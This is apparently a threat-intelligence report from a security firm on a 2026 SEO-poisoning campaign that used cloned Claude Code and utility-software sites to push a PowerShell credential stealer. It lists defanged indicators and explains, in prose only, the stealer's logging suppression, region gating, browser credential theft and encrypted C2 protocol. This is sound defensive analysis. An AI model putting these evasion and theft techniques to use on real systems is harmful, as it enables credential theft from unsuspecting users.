TL;DR

mnemonic’s Threat Intelligence team investigated this campaign after multiple detections in our customer base. The campaign uses search engine optimisation (SEO) poisoning, cloned software sites, malicious installation instructions, and signed loader binaries to deliver credential theft tooling disguised as legitimate software.

In March 2026, the threat actor used lures themed around developer and utility software, including Mullvad VPN, KeePassXC, WinSCP, Joplin, Cyberduck, PuTTY, Amazon S3 Browser, FileZilla, and EmEditor. Based on public sandbox data, the initial activity used signed malicious binaries as its first stage.

In April 2026, we observed a change in the threat actor behaviour. We detected multiple customers attempting to download and execute scripts related to installation of Claude Code. The threat actor used basic request gating, and provided a benign Claude Code installation script in some cases.

The primary PowerShell payload observed in this latest activity functions as both a stealer and a loader. It disables PowerShell ETW logging, applies anti-analysis and regional gating, fingerprints the host, steals credentials and application data, encrypts the resulting record set, uploads the data to attacker-controlled infrastructure, and can execute additional PowerShell supplied by the server.

This campaign is one of many we’ve observed targeting users of AI tooling via SEO poisoning over the last year. It highlights the efficiency of such attacks, as we continue to observe end users executing malicious commands attempting to download such tooling.

mnemonic's initial detection and response

In early April 2026, mnemonic detected multiple cases of ClickFix-like attacks at multiple customers. Both the user activity and executed commands appeared consistent with legitimate installation of Claude Code on Windows hosts.

Initial command

The install.ps1 is a direct copy of the legitimate version from Anthropic, but it downloads binaries from Google Cloud Storage (GCS) instead of Anthropic’s servers. Manual download of binaries from the GCS returns legitimate signed version of Claude Code.

An analysis of host data indicated, however, that additional PowerShell script was downloaded (SHA-256: 58f88ee2542e720f15d0b08d52c96384c7a7ae49b26e2dfd0754a9d63bf22375) and attempted to execute shortly after using aliases for Invoke-RestMethod and Invoke-Expression. These attempts were stopped by the Endpoint Detection and Response (EDR) technology running on the hosts.

Second stage command

While apparently stopped by EDR, mnemonic initiated a full AV scan on the device, and isolated the device until results were available. A thorough review of sign-in logs for impacted users was also performed.

mnemonic is currently researching relevant infrastructure and samples to further improve our detection capabilities for this campaign.

A full list of Indicators of Compromise is shared at the end of this article.

How the campaign works and what we currently know

The campaign is built around user intent. Victims search for a legitimate software package, land on a cloned or misleading software page, and are presented with either a download flow or a PowerShell installation command. That technique is particularly effective against developers and administrators, who routinely use bootstrap installers and terminal-based setup commands.

Our earliest observations of this campaign are from early March 2026, where the lure set spans multiple software categories, including developer tools, secure file transfer clients, password managers, VPN software, cloud storage utilities, and note-taking applications. The initial access vector was search-driven redirection to cloned software sites. Victims were funnelled to pages that presented a direct download button. In several cases, the threat actor appears to have used signed loader binaries to reduce friction at the point of execution and improve the credibility of the lure.

A change in the campaign occurred at the start of April, where the threat actor purely focused on Claude Code and moved to new infrastructure for initial stages. The backend infrastructure remained the same.

The threat actor finally moved to using Cloudflare mid-April 2026. This article focuses on infrastructure and samples observed in the April campaign.

The initial access vector was SEO poisoning redirecting to cloned software sites. Victims were funnelled to pages that presented a terminal-based installation command.

The installation (SHA-256: b9702ecf2928354dfc32e25468848408de40b82d237f83953fdc6d6d655050ef) appears legitimate and retrieves the latest version identifier from a GCS bucket, downloads claude.exe, validates the SHA-256 checksum from the release manifest, runs claude.exe install, and removes the temporary file. In our testing, legitimate, signed versions of Claude Code were downloaded.

This is likely request gating, an approach that preserves the appearance of legitimacy during casual review while still exploiting users who follow scripted installation guidance.

If the user passes the request gate, a likely malicious version is downloaded that further downloads the main PowerShell implant.

Note that the threat actor emulates the Claude Code installation guide, which specifically asks the user to download and install the legitimate version using the following PowerShell command.

The lure and staging infrastructure associated with the April 2026 activity is:

• claudecode[.]co[.]com
• claude-setup[.]com
• claudecode-install[.]co[.]com

The infrastructure was initially hosted at Global Connectivity Solutions LLP (ASN: 215540) and MIRhosting B.V. (ASN:52000) before being moved behind Cloudflare mid-April 2026.

The C2 host observed in the April 2026 activity was events.ms709[.]com. The malware builds victim-specific paths from a static campaign token and the local system's MachineGuid:

• /take/XYaR5gFi/<MachineGuid>
• /process/XYaR5gFi/<MachineGuid>
• /validate/XYaR5gFi/<MachineGuid>

What is the delivered payload?

The downloaded implant is a heavily obfuscated PowerShell stealer with loader functionality. Its core behaviour includes:

• PowerShell telemetry suppression
• anti-analysis checks
• regional execution blocking
• host profiling
• credential and application data theft
• encrypted exfiltration
• server-directed PowerShell execution

The payload supports broad credential and data theft while retaining the ability to stage additional PowerShell if the compromised host merits follow-on action.

The script disables PowerShell ETW logging before moving into collection. It reflects into System.Diagnostics.Eventing.EventProvider and System.Management.Automation.Tracing.PSEtwLogProvider, then clears the underlying provider state. This is a familiar technique, but it remains effective against environments that rely heavily on PowerShell telemetry for script visibility.

The payload also creates a single-instance global mutex. That mechanism prevents duplicate execution on the same host and reduces duplicate uploads to the C2.

The anti-analysis logic includes both heuristic checks and regional gating. The script exits when the current system resolves to one of the following blocked region codes:

This region list is consistent with the operational guardrails commonly used by financially motivated threat actors seeking to avoid infecting systems in Russia, the CIS region, and selected neighbouring jurisdictions.

The payload derives a stable victim identifier from HKLM:\SOFTWARE\Microsoft\Cryptography\MachineGuid. That value is embedded in the URI path used for beaconing and exfiltration, which makes the path structure itself useful for victim tracking and sample clustering.

The initial beacon contains:

• the campaign token XYaR5gFi
• Windows product and version data
• physical memory size
• current username
• computer name
• the machine-derived victim identifier

The payload also builds broader host inventory data, including Windows version and build information, RAM size, country code, installed software, running processes, username, computer name, and the machine GUID.

The script writes a sandbox.txt record that inventories common user folders such as Desktop, Documents, and Downloads. Those listings serve two purposes. First, they help the operator determine whether the system belongs to a real user rather than an analysis environment. Second, they expose naming conventions, user interests, and likely business context before the operator commits to further action.

Credential theft centres on four sources:

• Windows Credential Manager
• Chromium-based browsers
• Electron applications
• Software-specific credential stores and configuration files

The Credential Manager collector uses advapi32!CredEnumerate and stores output as WinCreds.txt. Browser and Electron theft targets standard Chromium artifacts such as Login Data, Web Data, History, Cookies, Network\Cookies, and Local State. The script explicitly handles encrypted_key and app_bound_encrypted_key, indicating awareness of modern Chromium key storage and support for working credential and cookie recovery rather than simple file collection.

The application set includes:

• Discord
• Slack
• Mattermost
• Notion
• Zoom
• WinSCP
• Steam
• OpenVPN
• Specter wallet

These targets point to a focus on browser sessions, enterprise access, VPN credentials, administrator tooling, and financially relevant artifacts.

How does Command and Control work?

The payload uses HTTPS and .NET System.Net.WebClient for transport, with the client configured to use the system proxy and DefaultCredentials. That choice improves execution reliability in enterprise environments where outbound traffic may require authenticated proxy access.

The C2 protocol uses a consistent JSON envelope containing three fields, where enc is encrypted with AES-CBC, key is RSA-encrypted using OAEP padding, and sig is an RSA PKCS#1 v1.5 signature over plaintext hashed with SHA-256.

For each outbound message, the following steps are performed:

1. Generate a random 32-byte AES key.
2. Generate a random 16-byte AES IV.
3. Encrypt plaintext with AES-CBC.
4. Concatenate AES_key || AES_IV into a 48-byte buffer.
5. Encrypt that 48-byte buffer with RSA-OAEP.
6. Sign the original plaintext with RSA PKCS#1 v1.5 SHA-256.
7. Base64-encode all three outputs.
8. Serialise as JSON with keys enc, key, and sig.

After exfiltration, the payload decrypts the server response, verifies the returned signature, parses the task stream, and dispatches commands by opcode.

That task launches:

Execution is performed through Shell.Application.ShellExecute with the open verb. This makes the payload both a stealer and a stage loader. A successful infection can therefore progress from credential theft to additional PowerShell delivery without requiring a new initial implant.

Concluding remarks

While not highly sophisticated, the campaign highlights how efficient SEO poisoning currently is when targeting broadly used tooling, combined with near-perfect clones of legitimate websites.

We are currently seeing multiple SEO campaigns targeting AI tooling, and expect this trend to continue as more and more end users (especially non-technical) want to use such tooling.